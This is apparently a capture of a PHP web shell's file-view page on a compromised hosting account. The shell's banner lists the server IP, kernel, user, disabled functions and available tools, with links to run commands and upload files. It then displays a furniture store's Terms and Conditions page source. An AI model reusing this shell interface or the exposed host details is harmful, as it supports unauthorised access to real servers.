Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/furniturevila/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); include ("Admin/Includes/db.php"); @$uid = $_SESSION['userid'] ; ?> <!DOCTYPE html> <html lang="en"> <?php include 'include/head.php'; ?> <body> <div class="page-loader"> <div class="spinner-border" role="status"> <span class="sr-only">Loading...</span> </div> </div> <div class="wrapper"> <!-- ======================== Navigation ======================== --> <?php include 'include/header.php'; ?> <!-- ======================== About ======================== --> <section class="about pt-4 pt-lg-5"> <!--Header--> <header> <div class="container"> <h2 class="title">Terms and Conditions</h2> <div class="text"> <!--<p>Suspendisse scelerisque odio eu felis eleifend, vitae gravida magna iaculis. Vestibulum volutpat, purus in consectetur porta, velit felis suscipit metus, et pharetra enim augue suscipit est. Aenean non ante tortor. Nam egestas tincidunt turpis, quis accumsan est vestibulum non</p>--> </div> </div> </header> <!--Main image--> <!--<div class="container-fluid">--> <!-- <div class="image">--> <!-- <img src="assets/images/gallery-2.jpg" alt="Alternate Text" />--> <!-- </div>--> <!--</div>--> </section> <!-- ======================== Team ======================== --> <section> <!--Header--> <header> <div class="container"> <div class="text"> <p>Welcome to MyFurnitureVilla, operated by [Your Company Name] ("we," "us," or "our"). By accessing and using our website, products, and services, you agree to comply with and be bound by the following Terms and Conditions. Please read these terms carefully before using our platform.</p> </div> <div class="text"> <p> 1. Acceptance of Terms: By using MyFurnitureVilla, you acknowledge that you have read, understood, and agree to be bound by these Terms and Conditions. If you do not agree with any part of these terms, please refrain from using our website and services.</p> </div> <div class="text"> <p> 2. Product Information: While we strive to provide accurate product descriptions and images, MyFurnitureVilla does not warrant that product descriptions, pricing, or other content on our website is error-free. We reserve the right to correct any errors, inaccuracies, or omissions and to change or update information at any time without prior notice.</p> </div> <div class="text"> <p> 3. Order Acceptance: Your order is an offer to purchase our products. We reserve the right to accept or decline your order for any reason, including but not limited to product availability, errors in product information, or issues with payment processing. In the event that we cannot fulfill your order, we will notify you and refund any payments received.</p> </div> <div class="text"> <p> 4. Pricing and Payment: Prices for products and services are subject to change without notice. We make every effort to display accurate pricing, but errors may occur. In the event of a pricing error, we reserve the right to cancel orders or adjust prices accordingly. Payment is required in full at the time of order placement.</p> </div> <div class="text"> <p> 5. Shipping and Delivery: Shipping and delivery estimates are provided for informational purposes only. While we strive to meet these estimates, actual delivery times may vary. MyFurnitureVilla is not responsible for delays or issues caused by third-party shipping providers. </p> </div> <div class="text"> <p> 6. Returns and Exchanges: Please refer to our "Return Policy" for information on returns, exchanges, and refunds. We aim to provide a fair and transparent process for resolving issues with your purchase.</p> </div> <div class="text"> <p> 7. Intellectual Property: All content on the MyFurnitureVilla website, including text, images, graphics, logos, and software, is the property of MyFurnitureVilla or its suppliers and is protected by copyright and other intellectual property laws. You may not use, reproduce, or distribute any content from our website without our express written consent.</p> </div> <div class="text"> <p> 8. Governing Law: These Terms and Conditions are governed by and construed in accordance with the laws of New Delhi. Any disputes arising out of or related to these terms shall be resolved in the courts of New Delhi.</p> </div> <div class="text"> <p> 9. Changes to Terms and Conditions: MyFurnitureVilla reserves the right to update and modify these Terms and Conditions at any time without prior notice. Any changes will be effective upon posting the revised terms on our website.</p> </div> <div class="text"> <p> 10. Contact Us: If you have any questions or concerns regarding these Terms and Conditions, please contact us at [provide contact information].</p> </div> <div class="text"> <p> Thank you for choosing MyFurnitureVilla. We appreciate your business and adherence to these terms.</p> </div> </div> </header> <!--Content--> </section> <!-- ======================== Numbers ======================== --> <!-- ================== Footer ================== --> <?php include 'include/footer.php'; ?> </div> <!--/wrapper--> <!--Scripts --> <script src="js/jquery.min.js"></script> <script src="js/bootstrap.js"></script> <script src="js/ion.rangeSlider.js"></script> <script src="js/magnific-popup.js"></script> <script src="js/owl.carousel.js"></script> <script src="js/tilt.jquery.js"></script> <script src="js/jquery.easypiechart.js"></script> <script src="js/bigtext.js"></script> <script src="js/main.js"></script> </body> </html>